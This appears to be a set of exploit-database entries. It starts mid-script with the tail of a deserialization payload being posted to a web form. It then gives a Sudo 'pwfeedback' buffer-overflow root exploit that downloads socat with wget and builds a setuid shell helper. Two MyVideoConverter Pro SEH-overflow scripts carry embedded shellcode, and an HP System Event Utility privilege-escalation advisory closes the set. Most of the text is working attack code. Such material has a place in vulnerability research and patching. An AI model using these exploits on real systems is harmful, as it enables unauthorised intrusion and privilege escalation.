cmd = cmd.replace("'","&#39;")
escapedcmd = escape(cmd)
print(escapedcmd)
srlcmd = serialize_command(escapedcmd)
length = 1448 + len(escapedcmd)
hex_length = format(length * 4,'x')
serialized_length = hex_length[::-1]
payload = payload.replace("e200e200e200140024003400e200e200e200",srlcmd)
payload = payload.replace("zzzz",serialized_length)
print("Deserialized Payload:")
print(deserialize_command(payload[8:]))

data = {"__VIEWSTATE":viewstate,"__EVENTVALIDATION":eventvalidation,"ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData":payload}
thirdcall = requests.post(FullURL, data=data,headers=headers)
print("Payload launched! Check execution results. Exiting...")
-
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow
#!/bin/bash
# We will need socat to run this.
if [ ! -f socat ]; then
    wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
    chmod +x socat
fi

cat <<EOF > xpl.pl
\$buf_sz = 256;
\$askpass_sz = 32;
\$signo_sz = 4*65;
\$tgetpass_flag = "\x04\x00\x00\x00" . ("\x00"x24);
print("\x00\x15"x(\$buf_sz+\$askpass_sz) . ("\x00\x15"x\$signo_sz) . (\$tgetpass_flag) . "\x37\x98\x01\x00\x35\x98\x01\x00\x35\x98\x01\x00\xff\xff\xff\xff\x35\x98\x01\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x15"x104 . "\n");
EOF

cat <<EOF > exec.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    printf("Exploiting!\n");
    int fd = open("/proc/self/exe", O_RDONLY);
    struct stat st;
    fstat(fd, &st);
    if (st.st_uid != 0) {
        fchown(fd, 0, st.st_gid);
        fchmod(fd, S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);
    } else {
        setuid(0);
        execve("/bin/bash",NULL,NULL);
    }
    return 0;
}
EOF

cc -w exec.c -o /tmp/pipe
./socat pty,link=/tmp/pty,waitslave exec:"perl xpl.pl"&
sleep 0.5
export SUDO_ASKPASS=/tmp/pipe
sudo -k -S id < /tmp/pty
/tmp/pipe
-
MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow
#Exploit Title: MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-11
#Vendor Homepage : http://www.ivideogo.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a

## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "exploit.txt".
#2. Just copy the text inside "exploit.txt".
#3. Start the program. In the new window click "Options" > "Settings" .
#4. Now paste the content of "exploit.txt" into the field: "Output Folder" > Click "..."
#5. The calculator runs successfully

#!/usr/bin/python
from struct import pack

buffer = "\x41" * 268
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10045ebb)
#0x10045ebb : pop edi # pop ebx # ret | {PAGE_EXECUTE_READ} [mysubtitle.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)

shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode

try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
-
HP System Event Utility - Local Privilege Escalation
# Exploit Title: HP System Event Utility - Local Privilege Escalation
# Author: hyp3rlinx
# Date: 2020-02-11
# Vendor: www.hp.com
# Link: https://hp-system-event-utility.en.lo4d.com/download
# CVE: CVE-2019-18915

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.hp.com

[Product]
HP System Event Utility

The genuine HPMSGSVC.exe file is a software component of HP System Event Utility by HP Inc.
HP System Event Utility enables the functioning of special function keys on select HP devices.

[Vulnerability Type]
Local Privilege Escalation

[CVE Reference]
CVE-2019-18915

[Security Issue]
The HP System Event service "HPMSGSVC.exe" will load an arbitrary EXE and execute it with SYSTEM integrity.
HPMSGSVC.exe runs a background process that delivers push notifications. The problem is that HP Message Service
will load and execute any arbitrary executable named "Program.exe" if found in the user's c:\ drive.

Path: C:\Program Files (x86)\HP\HP System Event\SmrtAdptr.exe

Two handles are inherited, properties are Write/Read
Name: \Device\ConDrv

This results in an arbitrary code execution persistence mechanism if an attacker can place an EXE in this location,
and it can be used to escalate privileges from Admin to SYSTEM.

HP has released / is releasing a mitigation:
https://support.hp.com/us-en/document/c06559359

[References]
PSR-2019-0204
https://support.hp.com/us-en/document/c06559359

[Network Access]
Local

[Disclosure Timeline]
Vendor Notification: October 7, 2019
HP PSRT "product team will address the issue in next release" : January 13, 2020
HP advisory and mitigation release : February 10, 2020
February 11, 2020 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it,
and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that
due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts
no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of
security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow
# Exploit Title: MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow
# Exploit Author : ZwX
# Exploit Date: 2020-02-11
# Vendor Homepage : http://www.ivideogo.com/
# Tested on OS: Windows 10 v1803
# Social: twitter.com/ZwX2a

## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "Shell.txt".
#2. Just copy the text inside "Shell.txt".
#3. Start the program. In the new window click "Add" > "Convert DVD" > "TVSeries" .
#4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..."
#5. The calculator runs successfully

#!/usr/bin/python
from struct import pack

buffer = "\x41" * 268
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10039291)
#0x10039291 : pop ecx # pop ebx # ret 0x04 | {PAGE_EXECUTE_READ} [mysubtitle.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)

shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode

try:
    f=open("Shell.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"